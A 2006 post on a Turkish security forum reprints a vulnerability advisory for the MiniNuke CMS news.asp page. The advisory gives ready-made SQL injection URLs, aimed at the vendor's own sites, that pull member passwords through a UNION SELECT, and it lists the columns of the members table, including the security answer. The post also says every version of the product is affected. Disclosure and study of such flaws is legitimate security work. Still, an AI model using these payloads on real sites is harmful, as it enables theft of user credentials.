Tahribat.com Forumları
Bilişim Güvenliği
Mininuke CMS System <= 1.8.2 (News.Asp) SQL Injection Vulnerability

Yazar Gösterim 10 50 75 100
Ağ ve Veri Güvenliği     Hertürlü Web tabanlı Saldırı Taktik ve Stratejileri     Web sitesi Güvenliği, DOS - DDOS Saldırıları...     Bilgisayar Güvenliği - Backdoorlar     Virüs - Trojan - Keylogger - BotNet     Skype - Mirc - Irc - Icq - Mail Güvenliği     Bilişim Güvenliği     Hesaplar / Üyelikler     Domain - Hosting - Reseller - Dedicated Server - Virtual Server - IRC Shell - Seedbox     İnternet Güvenliğine Giriş Programlama     C#, Asp.Net, .Net Core     C - C++     Delphi - Pascal     Visual Basic - Basic - PicBasic ve Türevleri     Java     Android - IOS Programlama     Mobil Programlama     Asp - Php - Cgi - Perl     Assembly - Reverse Engineering     Html - CSS - XML - JavaScript - Ajax     Database - Veritabanı     Python     Grafik - Animasyon - Flash - 3D Modelleme     Webmaster ve Yazılım Geliştiriciler     Google / Yandex / Bing ve Servisleri     Programlama Genel     Programlamaya Giriş Bilgisayar ve Teknoloji     Microsoft Windows Ailesi İşletim Sistemleri     Linux ve Diğer İşletim Sistemleri     Donanım & Driver     Network - İnternet     Elektronik / Embedded / Mobil Cihazlar     Kriptoparalar & Blockchain     Fotografçılık ve Digital Fotograf Makineleri - Video Kameralar     Cep Telefonları, Gsm Operatörleri ve Mobil İnternet     Oyunlar     Yazılımlar / Diğer Programlar     Bilgisayarla İlgili Diğer Konular İnternet     Download / Dosya Paylaşım     Bilgisayar ve Internet Teknolojileri İle İlgili Video / Resim / Flash Paylaşım     İnternet Siteleri     Sosyal Ağlar Genel     Genel     Gündem - Güncel Konular     Derin Konular     Bilim Teknik Teknoloji     Müzik & Sinema & Tiyatro & Kitap & Televizyon & Seminerler & Edebiyat     Eğitim & Ödev & Bilimsel Döküman     E-Book     İş - Güç, E-Ticaret, Alışveriş     Hukuk & Muhasebe & Sigorta Soru - Cevap     Ulaşım Araçları ve Seyahat     Vukuatlar     Geyik & Teknoloji İle İlgili Olmayan Video / Resim / Flash Paylaşım Tahribat.com Konuları     Tahribat.com Programları®     Tahribat.Com - Açık Kapılar Önünde     Tahribat.Com - Sosyal Etkinlikler     TahriDepo

Mininuke CMS System <= 1.8.2 (News.Asp) SQL Injection Vulnerability

1. 12/Oca/06 21:51 Kısayol Şikayet Özel Mesaj
   Nuker
   
   

   Kayıt Tarihi: 09/Ekim/2005
   

   --Güvenlik Raporu--
   Nedir: MiniNuke CMS System <= 1.8.2 (news.asp) SQL Injection vulnerability 
   ---
   Yazar: Mustafa Can Bjorn "nukedx a.k.a nuker" IPEKCI
   ---
   Tarih: 12/01/06 08:47 PM
   ---
   Kontaklar:{
   ICQ: 10072
   MSN/Email: nukedx@nukedx.com
   Web: http://www.nukedx.com
   }
   ---
   Vendor: MiniNuke (www.miniex.net)
   Version: 1.8.2 ve muhtemelen alt sürümler.
   Hakkında:Bu metodla uzaktan saldıran birisi news.aspye SQL sorgusu çalıştırabilmekte.
   ---
   Nasıl&Örnek: GET -> http://[site]/news.asp?Action=Print&hid=[SQLQuery]
   http://www.miniex.net/news.asp?Action=Print&hid=66%20union+select+0,sifre,0,0,0,0,0,0,0,0+from+members+where+uye_id=52
   MEMBERS kolonları:
   uye_id
   sifre
   g_soru
   g_cevap
   email
   isim
   icq
   msn
   aim
   meslek
   cinsiyet
   yas
   url
   imza
   mail_goster
   avurl
   avatar
   --
   ajana sevgilerle
   Saygılar,
   NWPX team adına
   nuker a.k.a nukedx

   
   

   Edited: 13/01/06-->

   
   

   Ayrıca SQL injection açığı sadece 1.8.2 ve altını değil mevcut bütün mini-nuke sürümlerinde bulunmaktadır.
   Örnek kod 1.8.2 ve üstü için
   http://www.mini-nuke.info/news.asp?Action=Print&hid=66%20union+select+0,sifre,0,0,0,0,0,0,0,0,0+from+members+where+uye_id=52
   Referanslar:
   http://www.securityfocus.com/archive/1/421747/30/0/threaded
   http://seclists.org/lists/fulldisclosure/2006/Jan/0444.html
   http://archives.neohapsis.com/archives/fulldisclosure/2006-01/0439.html

   
   

   <--

   ---

   I wish you bear with me , stay near me a.k.a nukedx
   Alıntı yap

Cevapla